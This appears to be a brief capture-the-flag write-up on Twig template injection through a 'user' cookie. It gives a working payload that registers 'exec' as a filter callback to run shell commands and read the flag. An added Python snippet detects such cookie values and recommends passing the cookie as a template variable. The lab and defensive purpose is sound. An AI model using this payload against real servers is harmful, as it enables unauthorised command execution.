0x00 knowledge
Twig template injection
link:
0x01 solving
Testing reveals a Twig template injection.
Find the injection point:
As the prompt indicates, the user cookie is the injection point
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
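For the defending side, a check that flags this kind of value in the user cookie before it reaches the template engine. This is an added example, not part of the original writeup; the function names, the watched-cookie list and the sample headers are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Twig tag delimiters: {{ ... }}, {% ... %}, {# ... #}
TWIG_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}", re.S)
# Names the payload above uses to reach the Twig environment object
TWIG_ENV_ACCESS = re.compile(
    r"_self\s*\.\s*env|registerUndefinedFilterCallback|getFilter\s*\(", re.I)


def parse_cookie_header(header):
    """Split a raw Cookie header into {name: value}, tolerating odd characters."""
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            pairs[name] = value.strip('"')
    return pairs


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded braces are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_cookie_header(header, watched=("user",)):
    """Return (cookie_name, reason) findings for the watched cookies."""
    findings = []
    for name, raw in parse_cookie_header(header).items():
        if name not in watched:
            continue
        value = decode_fully(raw)
        if TWIG_ENV_ACCESS.search(value):
            findings.append((name, "twig-environment-access"))
        elif TWIG_DELIMS.search(value):
            findings.append((name, "twig-delimiters"))
    return findings


# Constructed sample headers (not captured traffic)
SAMPLES = [
    "session=abc; user=alice",
    "user=%7B%7B_self.env.registerUndefinedFilterCallback(%22exec%22)%7D%7D",
    "user=%257B%257B%20name%20%257D%257D",  # double-encoded {{ name }}
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(inspect_cookie_header(header), "<-", header)
```

A filter like this is only a backstop: the underlying fix is to pass the cookie value to the template as a variable instead of building template source from it.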